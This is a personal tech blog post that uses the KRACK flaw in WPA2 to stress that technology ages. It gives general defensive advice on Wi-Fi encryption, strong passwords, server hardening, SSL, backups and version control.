The recent KRACK flaw in the WPA2 protocol is a reminder of the limited life of all technology. All technology has a finite lifespan (intended or not) and you should not bet on a piece of technology being around long.
Wireless Broken (Again)
WEP wireless security was launched in 1997 and lasted until 2004, WPA and WPA2 replaced WEP but the recent flaw in WPA2 (originated from WEP) will forge an update to WPA2 or launch a WPA3. WPA2 was just a certified WPA.
WPA wireless encryption uses TKIP and AES encryption subsets, TKIP is similar to WEP and should not be used. AES subset is a more rigorous encryption subset available in WPA2 (and is used by the US Government. AES’s main weakness is a brute force attack to find the wireless password so ALL of your passwords must be unique and strong. Do not use common or shared passwords and make sure passwords are as strong as allowed. I personally use the 1Password Password Manager to generate strong passwords and if you are feeling nerdy you can use the GRC Password Generator. https://howsecureismypassword.net/ is a good site that allows you to see how secure a password is (how long a brute force attack would take to obtain your password by brute force).
What can you do to fix wifi
- If you are using TKIP in WPA use AES instead.
- Check your WiFi routers manufacturer and ask for a new firmware that will fix the KRACK attack.
It is up to you to know the rick for each technology you use and when you stop using it.
Support Windows
Most operating systems and web browsers have support windows but security protocols, encryption and cyphers do not? why?
Not just Wifi is Broken
As a developer always assume things are insecure and always prepare for the worst, you should ensure brute force attacks are blocked by setting up a firewall on your serves, run a security audit and install software level plugins to ban IP’s when brute force attacks happen. Don’t forget to set up an SSL certificate (read my Lets Encrypt guide here) and if you want extra security read here on SSL certificate Public Key Pinning.
You can deploy a server in the cloud for as low as $2.5 a month (guide here) on Vultr or set up a server on Digital Ocean (first 2 months are free) read my setup guide here.
Depreciation of libraries and code
Software developers are all too familiar with the depreciation of libraries and code, recently I had to switch from mysql_connect routines that was deprecated in PHP 5.5, luckily a mysqli_connect was available so not a real problem.
Having to switch technology to a faster and or more secure version is a win-win IMHO.
Backup
Whats your backup plan? Don’t forget you can easily backup with RSync. There is no excuse for backing up your data.
Git
You should also use source code repositories like GitHub or BitBucket to manage code versions and restore environments when things go bad.
Social Media
Hashtags are also a great way to stay up to date on exploits (#KRACK, #vuln, #CVE etc).
Handy links
Read more on hackers Tactics, Techniques & Common Knowledge.
Read the OWASP guide to pick up software security best practices.
Stay safe: Research, Secure and Backup.
More Soon.
Donate and make this blog better
Ask a question or recommend an article
[contact-form-7 id=”30″ title=”Ask a Question”]
Revision History
v1.1 Added support windows..
etc